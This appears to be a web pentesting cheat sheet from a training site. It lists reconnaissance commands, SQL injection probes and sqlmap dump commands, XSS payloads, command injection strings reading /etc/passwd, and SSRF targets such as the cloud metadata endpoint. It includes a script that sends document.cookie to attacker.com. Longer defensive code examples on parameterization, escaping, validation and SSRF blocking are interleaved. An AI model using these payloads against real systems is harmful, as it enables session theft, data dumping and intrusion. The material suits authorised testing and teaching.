CertifiedHacker

Cheat Sheet: Web Pentesting


Web Pentest Cheat Sheet

The most frequently used commands and payloads from Part I, in one place.

Reconnaissance

nmap -sC -sV -oN scan.txt target.com
gobuster dir -u https://target.com -w /usr/share/wordlists/dirb/common.txt
nikto -h https://target.com

SQL Injection

# Detection
' OR 1=1--
' UNION SELECT NULL,NULL--

# SQLMap
sqlmap -u "https://target.com/page?id=1" --dbs
sqlmap -u "https://target.com/page?id=1" -D dbname --tables
sqlmap -u "https://target.com/page?id=1" -D dbname -T users --dump
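Why the two detection payloads above work, and what stops them, as an added example that is not part of the original cheat sheet: a constructed in-memory SQLite users table is queried once by string concatenation and once with a bound parameter. The table contents and column names are assumptions made for the example.

```python
import sqlite3


def make_db():
    """Build a constructed sample database: three users, two columns we select from."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "alice", "s3cret"), (2, "bob", "hunter2"), (3, "carol", "pw")],
    )
    conn.commit()
    return conn


def lookup_vulnerable(conn, name):
    # String concatenation: the input becomes part of the SQL grammar, so
    # ' OR 1=1-- turns the WHERE clause into a tautology and -- comments out
    # the closing quote; ' UNION SELECT NULL,NULL-- appends a second query
    # whose two NULL columns match the two selected columns.
    sql = "SELECT id, name FROM users WHERE name = '" + name + "'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # Bound parameter: the driver sends the input as a value, never as SQL,
    # so the same payloads are simply compared against the name column.
    return conn.execute(
        "SELECT id, name FROM users WHERE name = ?", (name,)
    ).fetchall()


if __name__ == "__main__":
    db = make_db()
    for payload in ["' OR 1=1--", "' UNION SELECT NULL,NULL--"]:
        print(repr(payload))
        print("  concatenated:", lookup_vulnerable(db, payload))
        print("  parameterized:", lookup_safe(db, payload))
```

The UNION probe is the interesting one for defenders: it only returns a row when the injected SELECT has the same column count as the original, which is exactly why testers step through `NULL`, `NULL,NULL`, and so on. Parameterization removes the whole class; escaping quotes by hand does not, because numeric contexts have no quotes to escape.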

XSS

// Reflected test
<script>alert(document.domain)</script>
<img src=x onerror=alert(1)>
<svg onload=alert(1)>

// Cookie stealing
<script>fetch('https://attacker.com/?c='+document.cookie)</script>
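The defender's side of the reflected payloads above, as an added example that is not from the cheat sheet: a search page that echoes a query parameter, first unencoded and then HTML-entity-encoded, plus a small detector that URL-decodes the request line of constructed access-log entries and flags the markers these payloads share. The log lines, the `/search?q=` endpoint and the marker list are assumptions for the example.

```python
import html
import re
from urllib.parse import unquote

# Constructed access-log lines (combined-log style); the second and third
# carry the cheat sheet's reflected test payloads, URL-encoded.
LOG_LINES = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /search?q=shoes HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:01 +0000] "GET /search?q=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1" 200 640',
    '10.0.0.9 - - [01/Jan/2024:12:00:02 +0000] "GET /search?q=%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E HTTP/1.1" 200 640',
]


def render_vulnerable(query):
    # Reflects the parameter into the element body unchanged, so a <script>,
    # <img onerror=...> or <svg onload=...> payload becomes live markup.
    return "<p>Results for: " + query + "</p>"


def render_safe(query):
    # Entity-encodes < > & " ' for the element-body context; the browser then
    # renders the payload as text instead of parsing it as a tag.
    return "<p>Results for: " + html.escape(query, quote=True) + "</p>"


# Tag names and event handlers used by the payloads on this page (assumed list).
XSS_MARKERS = re.compile(
    r"<\s*/?\s*(script|img|svg|iframe)\b|\bon(error|load|click|mouseover|focus)\s*=",
    re.IGNORECASE,
)
REQUEST_TARGET = re.compile(r'"(?:GET|POST) (\S+)')


def flag_xss_requests(log_lines):
    """Return the log lines whose URL-decoded request target contains a marker."""
    flagged = []
    for line in log_lines:
        match = REQUEST_TARGET.search(line)
        if not match:
            continue
        target = unquote(match.group(1))  # one decoding pass, as the server would do
        if XSS_MARKERS.search(target):
            flagged.append(line)
    return flagged


if __name__ == "__main__":
    payload = "<script>alert(document.domain)</script>"
    print(render_vulnerable(payload))
    print(render_safe(payload))
    for line in flag_xss_requests(LOG_LINES):
        print("FLAGGED:", line)
```

`html.escape` is only correct for the element-body and quoted-attribute contexts; a value placed inside a `<script>` block or a URL needs that context's own encoder. The detector decodes once, so double-encoded payloads slip past it; a production rule would decode repeatedly until the string stops changing.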

Command Injection

; whoami
| cat /etc/passwd
$(id)
`id`
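Each of the four injection forms above depends on the input reaching a shell. An added example, not from the cheat sheet, of the two fixes that remove that dependency for a host-lookup feature (the `ping -c 1 <host>` wrapper is an assumed scenario): validate the value against a strict hostname allowlist and pass it as its own argv element, and, where a shell string cannot be avoided, quote it with `shlex.quote`. Nothing here executes a command; the functions only build the argument list or string.

```python
import re
import shlex

# Letters, digits, dots and hyphens only; a leading hyphen is rejected too so
# the value can never be read as a command-line option (argument injection).
HOSTNAME_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9.-]{0,252}")

# The injection forms from the cheat sheet; none of them survives the allowlist.
INJECTION_SAMPLES = ["; whoami", "| cat /etc/passwd", "$(id)", "`id`"]


def is_valid_host(host):
    """True only when host matches the hostname allowlist in full."""
    return HOSTNAME_RE.fullmatch(host) is not None


def build_vulnerable(host):
    # Shell string with the raw value: ; | $( ) and backticks are shell syntax,
    # so "x; whoami" runs a second command when passed with shell=True.
    return "ping -c 1 " + host


def build_safe(host):
    # argv list for subprocess.run(..., shell=False): no shell parses it, and
    # the allowlist rejects anything that is not a plain hostname.
    if not is_valid_host(host):
        raise ValueError("invalid hostname: %r" % host)
    return ["ping", "-c", "1", host]


def quoted_shell_command(host):
    # Fallback when a shell is unavoidable: shlex.quote wraps the value in
    # single quotes so metacharacters are passed literally to the program.
    return "ping -c 1 " + shlex.quote(host)


if __name__ == "__main__":
    for sample in INJECTION_SAMPLES:
        print(repr(sample), "valid host:", is_valid_host(sample))
        print("  raw shell string :", build_vulnerable(sample))
        print("  quoted shell str :", quoted_shell_command(sample))
    print("argv for example.com:", build_safe("example.com"))
```

Prefer the argv form; quoting is a second line of defence, not a replacement for validation, because it protects the shell but not the called program's own option parsing.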

SSRF

# AWS metadata
http://169.254.169.254/latest/meta-data/
# Internal services
http://127.0.0.1:8080/admin
http://localhost:6379/
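An added example, not from the cheat sheet, of the server-side check that blocks the three targets above when an application fetches user-supplied URLs: the hostname is resolved and every returned address is tested against loopback, link-local (which contains the 169.254.169.254 metadata endpoint), private and IPv4-mapped ranges. The resolver is injectable so the check can be exercised offline with a constructed lookup table; `rebind.test`, `mapped.test` and the 203.0.113.10 address in that table are assumptions for the example.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Address ranges an outbound fetch must never reach.
BLOCKED_NETWORKS = [ipaddress.ip_network(n) for n in (
    "127.0.0.0/8",      # loopback (127.0.0.1:8080/admin)
    "169.254.0.0/16",   # link-local, includes the cloud metadata endpoint
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",  # RFC 1918
    "0.0.0.0/8",        # "this network", reaches localhost on some stacks
    "::1/128", "fc00::/7", "fe80::/10",                # IPv6 equivalents
)]


def default_resolver(host):
    """Resolve a hostname (or IP literal) to all of its addresses."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})


def is_safe_url(url, resolver=default_resolver):
    """True only for http(s) URLs whose every resolved address is public."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return False
    host = parts.hostname
    if not host:
        return False
    try:
        addrs = resolver(host)
    except (OSError, KeyError):
        return False
    if not addrs:
        return False
    for addr in addrs:
        ip = ipaddress.ip_address(addr)
        # ::ffff:127.0.0.1 is loopback in disguise; compare the inner address.
        if ip.version == 6 and ip.ipv4_mapped is not None:
            ip = ip.ipv4_mapped
        if any(ip in net for net in BLOCKED_NETWORKS):
            return False  # one private answer is enough to refuse the fetch
    return True


# Constructed resolver table for offline use; 203.0.113.10 is a documentation address.
FAKE_DNS = {
    "localhost": ["127.0.0.1"],
    "127.0.0.1": ["127.0.0.1"],
    "169.254.169.254": ["169.254.169.254"],
    "example.com": ["203.0.113.10"],
    "rebind.test": ["203.0.113.10", "10.0.0.1"],
    "mapped.test": ["::ffff:127.0.0.1"],
}


def fake_resolver(host):
    return FAKE_DNS[host]


if __name__ == "__main__":
    for url in ("http://169.254.169.254/latest/meta-data/",
                "http://127.0.0.1:8080/admin", "http://localhost:6379/",
                "https://example.com/"):
        print(url, "->", "allowed" if is_safe_url(url, fake_resolver) else "blocked")
```

Two caveats a reviewer would raise: the check is only meaningful if the HTTP client then connects to the address that was validated (pin it, or re-check inside the client's connect hook), otherwise a DNS answer that changes between check and use defeats it; and redirects must be validated again, since a public host can 302 to the metadata endpoint.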

Useful Burp Suite tips

Intercept > Forward/Drop per request
Repeater: Ctrl+R from Proxy history
Intruder: Sniper for single-parameter fuzzing
Decoder: Smart decode for multi-layer encoding